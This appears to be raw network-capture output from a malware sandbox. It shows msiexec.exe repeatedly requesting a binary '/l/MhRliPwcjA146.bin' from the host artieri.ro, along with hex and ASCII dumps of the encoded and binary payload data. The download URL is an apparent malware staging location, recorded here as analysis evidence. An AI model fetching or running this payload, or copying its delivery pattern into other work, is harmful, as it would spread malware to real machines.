                                                            2024-10-18 10:39:09 UTC16384INData Raw: 79 6b 5a 57 35 53 6b 63 61 47 43 53 67 4a 33 74 36 6c 37 57 37 34 4d 39 5a 47 70 42 7a 75 31 70 44 4f 34 6a 68 57 6e 68 49 35 4c 50 34 53 4f 53 4c 5a 64 30 46 4f 6a 44 7a 41 38 70 54 33 41 5a 55 6e 63 69 6b 73 38 4a 4e 6e 62 50 34 65 38 59 41 49 45 4c 6d 6f 39 6d 76 6f 58 59 43 34 78 74 62 64 4c 4a 70 38 57 68 6c 70 2f 68 43 72 4b 50 69 6d 4d 4a 47 30 4c 44 49 5a 4c 50 57 48 48 57 30 42 43 69 59 33 2f 4a 55 68 74 4f 43 46 36 48 63 66 46 30 4c 62 6f 72 32 51 52 4f 46 76 65 35 50 50 4f 69 66 55 69 34 56 53 4e 4f 4a 73 58 71 6f 38 78 78 44 6b 59 44 49 71 68 53 5a 66 76 74 33 32 37 38 33 56 61 62 52 65 47 75 62 38 41 61 38 42 2f 77 62 71 56 48 30 78 59 48 75 36 4c 76 73 32 58 41 6b 73 2f 75 72 4a 44 65 34 53 50 4e 54 69 43 34 4f 6f 42 35 47 6c 68 45 62 41 47
                                                            Data Ascii: ykZW5SkcaGCSgJ3t6l7W74M9ZGpBzu1pDO4jhWnhI5LP4SOSLZd0FOjDzA8pT3AZUnciks8JNnbP4e8YAIELmo9mvoXYC4xtbdLJp8Whlp/hCrKPimMJG0LDIZLPWHHW0BCiY3/JUhtOCF6HcfF0Lbor2QROFve5PPOifUi4VSNOJsXqo8xxDkYDIqhSZfvt32783VabReGub8Aa8B/wbqVH0xYHu6Lvs2XAks/urJDe4SPNTiC4OoB5GlhEbAG
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 66 2f 57 6e 53 55 34 69 75 58 42 34 4d 71 5a 52 54 69 4b 75 62 2b 37 76 6f 6d 45 4c 41 4b 6c 6b 39 79 41 61 51 70 78 71 76 71 76 4e 34 53 4e 36 4f 33 77 67 6b 6b 73 46 71 67 2f 73 34 79 4f 53 52 69 49 62 55 5a 78 71 76 72 48 4e 34 53 50 30 53 6a 47 69 37 37 74 68 64 4a 4c 50 37 71 78 78 50 42 37 63 65 76 4c 34 49 35 4b 6e 45 49 31 74 2b 32 44 61 47 72 64 30 54 42 50 4c 78 64 72 54 6b 50 65 69 6c 75 75 36 57 42 55 2f 43 4f 75 53 7a 2b 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: f/WnSU4iuXB4MqZRTiKub+7vomELAKlk9yAaQpxqvqvN4SN6O3wgkksFqg/s4yOSRiIbUZxqvrHN4SP0SjGi77thdJLP7qxxPB7cevL4I5KnEI1t+2DaGrd0TBPLxdrTkPeiluu6WBU/COuSz+EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 35 47 65 69 6f 6c 2f 4f 77 6a 46 4c 46 61 4a 73 34 66 43 41 68 4d 71 4a 6e 49 76 4b 7a 45 63 74 31 75 53 69 37 37 2b 4a 41 70 4c 50 37 71 7a 77 51 75 49 6a 55 66 63 78 70 33 61 70 5a 50 41 5a 67 38 55 6e 56 63 34 50 4c 66 4e 61 5a 50 41 54 2f 69 75 2b 4d 72 67 49 2b 35 4c 50 34 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: 5Geiol/OwjFLFaJs4fCAhMqJnIvKzEct1uSi77+JApLP7qzwQuIjUfcxp3apZPAZg8UnVc4PLfNaZPAT/iu+MrgI+5LP4QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 4a 32 41 58 74 68 52 64 38 51 4a 4f 31 51 64 73 48 43 75 61 71 68 61 48 47 6b 70 47 58 50 43 54 7a 2b 47 63 38 64 32 75 4c 71 6f 71 59 4f 52 66 2b 74 4c 66 46 78 35 67 35 47 68 6e 35 2b 49 54 43 44 63 74 35 66 70 6b 2b 38 58 33 48 36 67 76 48 4f 41 6a 6b 6b 34 62 75 33 63 7a 77 61 6f 48 51 75 41 6a 6b 6e 56 6b 76 38 56 42 68 39 52 56 78 39 4f 69 65 4c 4d 46 55 44 39 4f 43 30 52 46 71 73 32 69 55 4a 48 2b 6f 64 6d 64 61 72 59 66 7a 75 45 6a 47 33 4b 4e 49 5a 4c 50 61 4e 54 46 52 46 78 50 6b 4d 2f 68 71 67 64 57 34 43 4f 53 64 54 31 50 2f 49 6a 5a 7a 78 4d 39 4a 56 49 48 59 6f 66 55 55 31 4d 46 6f 6d 42 2f 58 36 2f 68 53 7a 4f 69 65 47 64 43 56 41 75 64 61 72 59 4c 7a 75 45 6a 5a 51 6a 51 6a 64 61 56 61 4b 37 69 7a 65 45 6a 4b 31 65 79 43 61 32 70 5a 50 49
                                                            Data Ascii: J2AXthRd8QJO1QdsHCuaqhaHGkpGXPCTz+Gc8d2uLqoqYORf+tLfFx5g5Ghn5+ITCDct5fpk+8X3H6gvHOAjkk4bu3czwaoHQuAjknVkv8VBh9RVx9OieLMFUD9OC0RFqs2iUJH+odmdarYfzuEjG3KNIZLPaNTFRFxPkM/hqgdW4COSdT1P/IjZzxM9JVIHYofUU1MFomB/X6/hSzOieGdCVAudarYLzuEjZQjQjdaVaK7izeEjK1eyCa2pZPI
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 75 4f 42 78 56 2f 5a 4b 55 65 46 32 79 2f 30 6a 37 4f 35 35 78 58 44 6b 47 2b 42 6b 59 4e 52 47 41 64 54 69 45 79 44 32 4f 34 4b 51 59 4f 53 58 43 50 44 33 45 79 42 65 68 39 73 51 73 72 38 62 4c 4f 41 59 44 36 6c 6b 32 75 37 53 6e 59 49 2f 38 54 72 44 74 54 74 4a 38 4b 59 6f 4c 61 51 51 32 38 59 6f 4b 6c 52 2b 33 43 64 44 2b 34 5a 43 78 6d 58 4c 44 30 66 65 70 52 63 48 75 68 39 2b 6b 43 31 2f 4f 59 6e 73 64 7a 41 32 39 59 36 54 48 4f 35 45 48 47 30 41 58 74 4d 2b 6c 71 57 6a 41 67 45 32 44 4d 6a 2b 7a 64 50 4f 32 4c 37 56 59 57 71 30 77 73 66 68 49 35 46 59 34 53 75 53 7a 37 4f 69 2f 2b 2b 68 49 35 50 50 61 71 34 2b 7a 2b 45 6a 47 33 72 43 49 5a 4c 50 37 69 4b 49 79 75 45 6a 6b 73 2f 68 49 35 49 68 41 67 68 56 43 2b 62 56 64 6c 6f 4f 37 6b 55 69 6d 5a 32
                                                            Data Ascii: uOBxV/ZKUeF2y/0j7O55xXDkG+BkYNRGAdTiEyD2O4KQYOSXCPD3EyBeh9sQsr8bLOAYD6lk2u7SnYI/8TrDtTtJ8KYoLaQQ28YoKlR+3CdD+4ZCxmXLD0fepRcHuh9+kC1/OYnsdzA29Y6THO5EHG0AXtM+lqWjAgE2DMj+zdPO2L7VYWq0wsfhI5FY4SuSz7Oi/++hI5PPaq4+z+EjG3rCIZLP7iKIyuEjks/hI5IhAghVC+bVdloO7kUimZ2
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 51 48 68 34 52 53 34 33 4e 50 47 52 52 6d 42 64 48 51 47 69 70 75 75 2f 62 45 71 37 74 70 77 52 65 4b 4a 70 45 7a 69 43 74 4b 31 4d 59 4e 53 42 6c 5a 33 71 47 2f 6a 2b 58 7a 32 66 62 68 41 70 56 55 66 4d 36 65 54 30 63 49 47 42 38 64 69 67 2f 4f 7a 62 7a 55 37 56 42 39 65 43 63 66 48 44 64 71 78 74 48 37 78 67 34 69 75 75 48 64 6b 54 4a 75 65 4d 47 36 47 33 76 78 73 70 36 43 30 50 53 68 42 64 6c 4a 4e 55 39 73 49 66 5a 58 63 59 31 43 51 6e 6a 6e 44 39 6d 4d 50 4e 6a 36 79 76 73 44 6a 35 51 6f 4b 30 46 42 32 47 59 2f 51 74 4b 53 2b 73 57 62 71 4b 52 6a 71 4f 4f 69 42 4e 5a 4c 70 74 67 6b 73 79 66 61 6f 66 75 48 51 74 49 4a 51 70 41 30 34 6d 50 56 5a 6d 6b 61 4a 56 30 4b 70 57 6d 45 34 57 44 78 62 6d 37 58 45 4f 52 67 4d 71 71 46 4c 59 34 75 48 4b 6b 67 58
                                                            Data Ascii: QHh4RS43NPGRRmBdHQGipuu/bEq7tpwReKJpEziCtK1MYNSBlZ3qG/j+Xz2fbhApVUfM6eT0cIGB8dig/OzbzU7VB9eCcfHDdqxtH7xg4iuuHdkTJueMG6G3vxsp6C0PShBdlJNU9sIfZXcY1CQnjnD9mMPNj6yvsDj5QoK0FB2GY/QtKS+sWbqKRjqOOiBNZLptgksyfaofuHQtIJQpA04mPVZmkaJV0KpWmE4WDxbm7XEORgMqqFLY4uHKkgX
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 34 64 57 4f 6f 4f 74 4e 41 47 4a 58 4c 30 30 62 59 2b 31 6b 67 43 5a 67 6c 75 2f 4e 34 53 50 36 48 4e 77 58 77 48 55 4b 4d 42 63 76 59 4e 48 50 5a 6a 50 62 45 7a 31 51 49 4b 54 45 59 4e 46 47 45 61 70 68 45 77 33 33 76 45 64 68 61 42 6e 52 30 59 33 79 57 48 6e 54 4a 2b 51 4c 7a 74 6d 61 2b 49 6f 2f 63 51 2b 67 57 4b 65 33 48 67 4e 70 47 37 6a 70 63 2b 50 7a 47 57 4b 78 41 75 39 68 52 4d 54 57 51 36 2f 62 52 46 54 4d 44 64 7a 6d 6c 57 43 6d 37 38 33 68 49 39 6e 57 39 6c 76 44 64 72 62 38 30 6f 4a 67 30 69 77 6e 57 2f 63 54 4a 71 73 4c 61 46 5a 6f 47 6c 62 2b 2f 6d 50 36 6c 5a 4e 38 39 53 74 6a 79 55 6d 32 66 4f 6b 67 6c 68 49 73 56 66 6a 68 49 35 4c 50 34 53 4f 53 46 54 7a 73 70 4a 75 43 6f 4d 48 36 39 52 45 69 74 59 67 58 73 58 58 32 51 4f 41 66 49 4f 78
                                                            Data Ascii: 4dWOoOtNAGJXL00bY+1kgCZglu/N4SP6HNwXwHUKMBcvYNHPZjPbEz1QIKTEYNFGEaphEw33vEdhaBnR0Y3yWHnTJ+QLztma+Io/cQ+gWKe3HgNpG7jpc+PzGWKxAu9hRMTWQ6/bRFTMDdzmlWCm783hI9nW9lvDdrb80oJg0iwnW/cTJqsLaFZoGlb+/mP6lZN89StjyUm2fOkglhIsVfjhI5LP4SOSFTzspJuCoMH69REitYgXsXX2QOAfIOx


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.44973989.44.138.1294435544C:\Windows\SysWOW64\msiexec.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-18 10:39:48 UTC190OUTGET /l/MhRliPwcjA146.bin HTTP/1.1
                                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Cache-Control: no-cache
                                                            Host: artieri.ro
                                                            Connection: Keep-Alive
                                                            2024-10-18 10:39:48 UTC404INHTTP/1.1 200 OK
                                                            Connection: close
                                                            content-type: application/octet-stream
                                                            last-modified: Fri, 18 Oct 2024 05:10:16 GMT
                                                            accept-ranges: bytes
                                                            content-length: 494656
                                                            date: Fri, 18 Oct 2024 10:39:48 GMT
                                                            server: LiteSpeed
                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                            2024-10-18 10:39:48 UTC16384INData Raw: 2d f5 ac c5 0d 34 cc c7 d7 d3 35 6d 95 21 08 b8 bb f6 f0 f7 17 96 64 3a 07 f1 a9 a2 76 00 86 75 50 23 a9 55 93 5a 39 86 6a 78 4b 3d 49 4c 09 09 a0 3b f2 45 1b 4e 37 60 d1 79 66 11 6b 37 e9 d5 2a 39 b9 44 a7 aa 48 9c 71 78 70 e7 84 07 0a 42 4f f2 3a e2 45 ce 94 eb 6c 47 21 98 4e f0 1b 64 24 49 70 ff da e8 6a b8 1d 9c 19 73 e1 ec 03 3c 52 cc 2b d2 1f 0e 52 bf f7 0f df 74 ee 1f 4b 55 89 81 34 d3 a2 34 ba 55 17 bb fc af cf 1b a2 31 41 37 90 64 07 1c 26 ec a5 19 30 26 83 8e 39 b4 7c b1 86 6c 83 bf bc 79 66 d9 92 43 0f 37 3a 02 3e 87 a8 18 fb 15 e4 f7 84 11 c2 0c 38 05 c2 8c 9a 3f 5b 66 0a 4e cc 41 0c 41 09 25 49 7c e8 d5 bd c8 5a 91 99 0f 1d cb 5b e8 df c1 95 6e 89 63 07 85 d6 d7 d8 50 36 e1 8e 20 54 11 10 0b ed df 22 af 49 b1 c9 a8 74 ec d6 40 b2 fb dd d7 78
                                                            Data Ascii: -45m!d:vuP#UZ9jxK=IL;EN7`yfk7*9DHqxpBO:ElG!Nd$Ipjs<R+RtKU44U1A7d&0&9|lyfC7:>8?[fNAA%I|Z[ncP6 T"It@x
                                                            2024-10-18 10:39:48 UTC16384INData Raw: 93 b0 08 88 c3 4a 30 41 63 7a 07 c6 67 cf a6 a5 6b 69 c0 eb dc 38 74 78 e6 9e 95 3c e8 a7 cc cf b8 be 75 f1 a5 9a 7b c1 55 12 41 9e 26 02 55 7f 6a ef d4 c1 a1 18 91 0d 0d 74 15 ce c8 3e 39 89 34 e9 e9 c9 ad fb 23 87 3a 7b f1 79 51 d3 28 e9 fd 4c cf 7d 67 39 24 45 58 af 2a 43 c7 bc 05 47 0f 12 4c 3f c5 05 7e 81 62 e8 23 87 7c 42 7e 46 5f e3 bd 60 ec 9e 5d 02 30 0e ed 4b 44 2e b8 09 e5 b8 c4 62 13 4a 6b 62 51 0c 20 9d ab 27 5c ac 95 1f a9 94 36 7f 93 03 ad f5 be 2b 79 cb b0 32 33 29 38 f7 19 4c 2c c9 d0 5b 06 d8 15 fa aa a3 d4 73 21 06 7a 6f 05 94 bc 13 e7 3d b1 4e 64 90 7f e1 2b c7 b8 7b 00 15 b8 ad 60 67 a1 38 e8 e7 5a 63 85 db 11 78 dc fd 0c a4 98 a7 b1 a8 4e e2 cf 40 a3 3c 0b d6 7e 8b 79 64 af 13 a8 1c 5c 88 f2 4a 47 b8 db f5 90 32 bb aa 3a 14 b3 25 a0
                                                            Data Ascii: J0Aczgki8tx<u{UA&Ujt>94#:{yQ(L}g9$EX*CGL?~b#|B~F_`]0KD.bJkbQ '\6+y23)8L,[s!zo=Nd+{`g8ZcxN@<~yd\JG2:%
                                                            2024-10-18 10:39:48 UTC16384INData Raw: 9e c3 95 0b 05 34 d8 f2 8b b4 e7 82 0b f0 cc 3c f5 96 db cc 8b 83 76 67 91 3f 53 da 5f 08 6b 13 df fb 99 ee 6d 1a 59 eb 44 22 9b a8 19 b8 3c 4c 01 b6 9c 1c 7f bf 98 2e ae 9a 6c 37 a1 2a ff e9 c0 00 71 b6 d0 d1 56 6f cd 86 28 15 2d 3a 9b 9d 5e 8b 5c ed 03 3a 52 e3 f3 e4 20 04 f8 8d 1e 7a eb 7a 84 ef ec 39 c0 6b 2e e0 14 ee c5 c2 5e 27 6b 53 fc 4d 21 8c e7 0d 1b 5c fe e3 17 8c 91 47 a7 ab 8b f8 77 be 0d 84 2a 4d ce 48 79 b7 a5 0e 60 b2 49 31 73 90 66 55 49 ac a8 ed 33 e9 b8 e5 fe b5 0d d0 f8 fd 42 c0 62 0a cf b9 a7 22 aa 72 97 90 76 e8 f6 26 fd bc 87 7c 83 d8 ce c5 4a 03 8b 0d 8d 87 25 11 9e 1f a1 73 06 56 7b b3 2f 58 d5 db 8f 65 62 7e 51 1e 85 bd 40 2f 36 28 f4 56 28 18 86 eb c3 59 91 57 b8 0d 60 d4 0f 5f 44 c6 b9 2c 71 9e f9 43 c0 1a da ab b1 e3 82 bd 03
                                                            Data Ascii: 4<vg?S_kmYD"<L.l7*qVo(-:^\:R zz9k.^'kSM!\Gw*MHy`I1sfUI3Bb"rv&|J%sV{/Xeb~Q@/6(V(YW`_D,qC
                                                            2024-10-18 10:39:49 UTC16384INData Raw: 70 5c d9 47 19 4c bc 01 70 08 4e 25 91 d0 8a c9 6d b7 e9 4f d8 df 07 ca bd ad 11 0b a0 40 e8 0b 57 4f a2 2e 67 e5 20 9e e3 49 b8 f0 3c 24 d3 79 a5 6a 21 1a de 00 95 36 93 eb e1 fe bc fb 16 e2 4b 35 be 5f 63 29 44 fd f3 c3 4c f8 34 54 ef 93 a1 0a 42 f7 ac b1 e2 86 31 e0 cf 28 2d 39 70 39 b9 e4 9b af 99 29 a6 5f 3a 1e a9 96 d0 3d 7b 09 f5 58 c3 ad 9c a0 18 f7 55 96 40 08 cd d7 74 a3 95 a7 04 d1 15 7f 35 85 80 b3 98 67 88 31 6b 47 c6 a7 b1 bc 44 b0 14 8a 06 bd cf 3b 01 18 ce 2c 08 47 db 08 91 67 cd b3 93 42 f2 1b 73 75 72 c0 b9 aa 10 93 2b 74 dc ab 5d e9 15 89 bf c6 0c bb e9 ce df c0 13 6a 2e b2 df c0 b4 bd d0 aa 53 88 13 d2 28 24 b2 7d d4 39 61 e8 3e 68 86 56 e5 85 8b 0f 96 35 eb 56 f3 71 b5 b0 77 8e 42 06 6f da d7 23 28 81 1d db 08 9b 3b df 7a d8 dd e4 c9
                                                            Data Ascii: p\GLpN%mO@WO.g I<$yj!6K5_c)DL4TB1(-9p9)_:={XU@t5g1kGD;,GgBsur+t]j.S($}9a>hV5VqwBo#(;z
                                                            2024-10-18 10:39:49 UTC16384INData Raw: c2 f4 c0 74 6f dc 73 ff aa 29 45 43 f0 d1 ef 70 a5 2d 1b 03 7e 06 2d b8 68 65 0c d0 b6 e1 39 cf f1 10 0c 6c a1 9b 02 ad 9a 6e f9 da 99 8d de 14 4b 0f ec b0 c6 f9 72 e1 93 88 41 79 60 b1 d5 8c fd 70 cc 04 e9 ec cd 22 91 20 79 88 f8 58 54 da 87 0c 2e 81 d7 a8 bf 9f c0 b7 6b 10 fc f7 89 1a ba 00 7f a0 45 a7 86 d2 71 c0 2c a5 cc f0 e4 92 8a 0a b9 1f 0e a8 6c 98 e8 c6 02 c2 a3 11 b4 7c 59 7c f7 7b 33 81 f0 38 56 17 e1 8a 8f d8 6c 47 a6 6f df ca 7a c2 6c 81 68 c5 93 76 06 be 4e e3 ee 9c da 14 38 cf 08 1f 41 00 8a 39 bb 84 2b f9 26 ea 44 77 62 a4 c1 0f 77 2e e4 1e c8 1c 9f 9e 0a 6c a7 3f 68 44 5c 0f 0a ce 9c fc 02 30 c8 63 44 bc ef 89 ea ac db 98 39 87 9e b7 f0 8b 2e a9 21 3a d9 78 cf e4 95 65 5c 3a af fc a1 ca 17 cb fa 4d 67 0d 66 9b 0b b6 1d 07 e0 e5 c1 f2 0f
                                                            Data Ascii: tos)ECp-~-he9lnKrAy`p" yXT.kEq,l|Y|{38VlGozlhvN8A9+&Dwbw.l?hD\0cD9.!:xe\:Mgf
                                                            2024-10-18 10:39:49 UTC16384INData Raw: 11 7a 3a 05 f4 a6 3c 49 10 c4 1a 25 1d 4e 2a 0b f9 8e 8e a5 84 84 7d 62 ad ff d7 d4 c4 10 9c d4 43 b8 69 6a a0 1a 2a a5 c0 a5 14 38 4a 57 7d 17 fd 96 54 df bb fc d0 77 d9 39 9d a4 8c 84 fa f3 a1 8b 40 50 42 48 f2 f4 c5 33 93 c1 97 a1 d2 cd 2e 41 94 8c 6c d8 75 02 6a ba 98 1d 3f fb 99 7b 2b 0b 7b eb 7a 06 0f 24 a0 06 f6 95 02 53 6a 1d 3d 0f 45 24 ba 6e f1 5d 0f 4e b1 3f 3f 92 c7 23 8a 91 47 c7 c8 9e ed 5a ca 8a ed cd b5 4a e9 58 b8 21 5b ea 46 f0 54 d0 d8 e2 48 19 21 2c 42 4f cc 80 6e 6d 67 60 5a e0 53 37 ca da c4 a9 88 a6 cb 63 a3 1a 1c d7 b1 f9 a2 77 54 13 de f9 ca 98 ca 18 8e 07 29 56 30 6b 13 ff d6 27 a8 0f cc f8 17 a1 85 1a 4e e5 65 38 60 e4 ac c2 6e df e2 e6 ac 7e 7c 85 b6 ce d5 ca ce 32 cf 2c 48 eb 9e 27 db f5 b2 46 2a 49 15 72 46 a0 a6 ca 40 97 13
                                                            Data Ascii: z:<I%N*}bCij*8JW}Tw9@PBH3.Aluj?{+{z$Sj=E$n]N??#GZJX![FTH!,BOnmg`ZS7cwT)V0k'Ne8`n~|2,H'F*IrF@
                                                            2024-10-18 10:39:49 UTC16384INData Raw: 5d cb 57 85 bc 51 cc 55 68 73 6a 8a 7c 1d 70 9e 02 ba 4e 84 6b 2e a5 34 97 ec 6f bd 02 ca 97 a0 b0 7b f5 a8 dc 0b 6a 34 5e ec d2 96 ce 88 23 2b ff 30 7a c6 39 33 b3 7a 72 3e 99 75 d9 45 de b7 a0 01 de c6 fd 56 54 95 7f 12 5b bf 90 d6 32 78 fb 1f f6 b4 2e 5a a1 7f 7e c6 69 9e c3 03 c8 bd de 67 c5 ff 96 20 00 71 1a fe 8a bf 95 e9 2d ca e6 07 c5 a8 88 f1 ba 1d ee 2c e0 85 55 b0 a0 cf 89 22 90 11 58 11 a3 86 71 a9 86 9c 4c ec 12 1f aa 1c 52 2e 7d 6e a3 89 da 14 8a 07 65 da 2c 3c 83 bb 1d b0 00 24 5e 9d 6f 0a f0 32 99 1f cd b7 ab 9c 1b 70 e4 6e 77 f0 24 4a 2f e7 16 a2 fe 9a 07 51 63 86 06 f8 55 c7 0f 7f cf 18 3e 3b 11 0d 54 2f 25 22 b5 7d 16 a6 53 10 3d ea 46 f9 83 7e 12 68 ed 8a a0 a0 db a2 f5 a9 b5 8f 96 94 27 92 07 6f 59 ee 4f 85 a4 fe 76 f2 73 fb a0 92 3c
                                                            Data Ascii: ]WQUhsj|pNk.4o{j4^#+0z93zr>uEVT[2x.Z~ig q-,U"XqLR.}ne,<$^o2pnw$J/QcU>;T/%"}S=F~h'oYOvs<
                                                            2024-10-18 10:39:49 UTC16384INData Raw: 3e d9 01 d8 f0 f0 72 7e 1c fc 19 ea 4a 80 37 0f 3e a0 39 41 4e a5 4c b3 2b 9f 6f 43 3e 0c 74 c7 a9 7a 11 65 de 44 da 24 25 b8 a5 ac 3f 29 17 9b 55 fe 09 0e 43 2f c4 50 5e b8 21 8a 84 5d a2 9e 2f d7 90 4a 69 c8 34 c1 a9 a6 ee 91 a6 b8 3e 63 4c 10 75 1f 6e 2a 57 14 73 01 55 62 ab e2 53 fc c1 f8 fa 77 49 36 43 0d 68 c1 11 05 56 5c d1 1a 90 87 99 d1 81 3c 1c f0 f9 35 7b b8 c9 ac 54 80 39 1b 44 8e 43 6e 77 74 0a 59 a3 cb d2 9d 13 83 10 5e 54 0c e4 2c 96 6d 33 d8 0e 5b 88 d7 3a 82 22 e0 35 10 4b 8a b2 2c af 9c 58 46 08 e1 b0 fc 93 27 49 8b a4 c0 fc dc 7f 1a a1 ad 85 cb 96 aa 18 7c 47 d6 a1 ee 88 e5 1f 92 47 f1 df c8 03 5f 1c 54 a3 81 9d 87 c2 47 ee db b2 70 c4 52 f3 2b 4c f7 17 fb d9 4d 90 8d 6d bc fd 1b 38 8b 57 d0 c1 44 40 c4 5c 27 f2 11 63 78 3f 5b 8e 89 14
                                                            Data Ascii: >r~J7>9ANL+oC>tzeD$%?)UC/P^!]/Ji4>cLun*WsUbSwI6ChV\<5{T9DCnwtY^T,m3[:"5K,XF'I|GG_TGpR+LMm8WD@\'cx?[
                                                            2024-10-18 10:39:49 UTC16384INData Raw: b9 f5 57 0b 7a 4e e8 bc b0 dd 05 bf 29 a8 d7 a5 43 23 43 0b 7f 7a d2 7f 74 fd 25 a7 00 28 2b cc fc 1f be 84 6e 7b 13 e3 ed f7 86 c4 e0 44 36 21 2f de 23 3b 80 bc 1a 6f b9 f4 f4 fb bc b9 e1 0e 88 ac 50 a9 1c 66 38 31 c2 70 85 81 33 50 71 85 28 96 b9 ca 6e 4c 7b 63 df 29 0f 69 4f 98 1d 3f c7 89 7b 1e 29 5c e9 7a 6c 79 67 4d 7b c4 f1 0b 2d 00 6a b0 88 18 a6 bb 6e a1 36 22 37 98 3f 37 3a ef 14 f4 58 b8 83 54 69 8d 52 ae 8d ae 67 90 d7 eb 55 b5 a5 0e bb ae c4 8c 3c d7 e5 c1 14 a1 93 e4 11 e8 b8 e5 db f7 ea 54 51 d2 96 c2 62 e2 e4 88 f6 ca b9 c0 1b 1c d1 bc fa 79 a3 09 20 1e 27 7e 54 cd a7 ca 4a 6e 59 87 73 9a 87 ef 1a 64 a2 06 f0 63 21 2c f0 17 80 e0 94 e2 20 37 b4 aa df 86 e7 a3 09 7e 8b 7a fc e2 ee c9 70 ee 14 0d eb 1b 0f 31 db 38 46 24 71 e4 8b bb fe d3 51
                                                            Data Ascii: WzN)C#Czt%(+n{D6!/#;oPf81p3Pq(nL{c)iO?{)\zlygM{-jn6"7?7:XTiRgU<TQby '~TJnYsdc!, 7~zp18F$qQ
                                                            2024-10-18 10:39:49 UTC16384INData Raw: be 85 08 c6 55 87 40 5c c1 9f 00 3e e7 62 9f 3b 95 ae 22 86 ff 72 47 3e a5 6b f7 f1 7b 26 82 db 05 7d 50 78 5e 8c ef 8c f4 7f c7 d7 df c1 44 ad 51 da 28 58 c4 28 21 24 6c 4c 85 ff 83 13 5d 60 31 2f 6e 14 e9 1d c0 88 58 0d 6f 70 ac e0 49 48 9c fc ff c4 e7 7b f8 81 d5 43 f2 3a e2 c0 1c e1 e3 46 c4 79 71 c1 f0 1b 64 a9 ce ac fd da e8 e1 77 77 9c 49 9b b4 13 fc c3 0b 95 ed 55 a7 0e 52 bf f6 8f 60 58 f4 1e 4b 52 f3 99 36 1b 5c 7f 4c 73 50 88 6a 57 02 3a f6 08 a3 cb 00 14 75 73 a9 ab f1 74 10 ce 3a b9 d2 00 7d be 6f 4d 87 d5 42 c2 49 07 34 32 b4 0c 4d 02 05 65 c8 54 85 49 16 4a 14 11 c2 0c 69 fa b6 a8 a6 cf 6c fb 42 54 1a d7 e0 6e df 5b 82 a2 1e 20 99 88 fa 57 c2 15 cb b7 2c e1 4e bf 7a 74 35 11 a1 eb 82 23 71 b5 26 18 77 42 06 6f 59 9a f8 fe aa 48 03 0c d2 39
                                                            Data Ascii: U@\>b;"rG>k{&}Px^DQ(X(!$lL]`1/nXopIH{C:FyqdwwIUR`XKR6\LsPjW:ust:}oMBI42MeTIJilBTn[ W,Nzt5#q&wBoYH9


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.44974089.44.138.1294435544C:\Windows\SysWOW64\msiexec.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-18 10:39:53 UTC190OUTGET /l/MhRliPwcjA146.bin HTTP/1.1
                                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Cache-Control: no-cache
                                                            Host: artieri.ro
                                                            Connection: Keep-Alive
                                                            2024-10-18 10:39:53 UTC404INHTTP/1.1 200 OK
                                                            Connection: close
                                                            content-type: application/octet-stream
                                                            last-modified: Fri, 18 Oct 2024 05:10:16 GMT
                                                            accept-ranges: bytes
                                                            content-length: 494656
                                                            date: Fri, 18 Oct 2024 10:39:53 GMT
                                                            server: LiteSpeed
                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
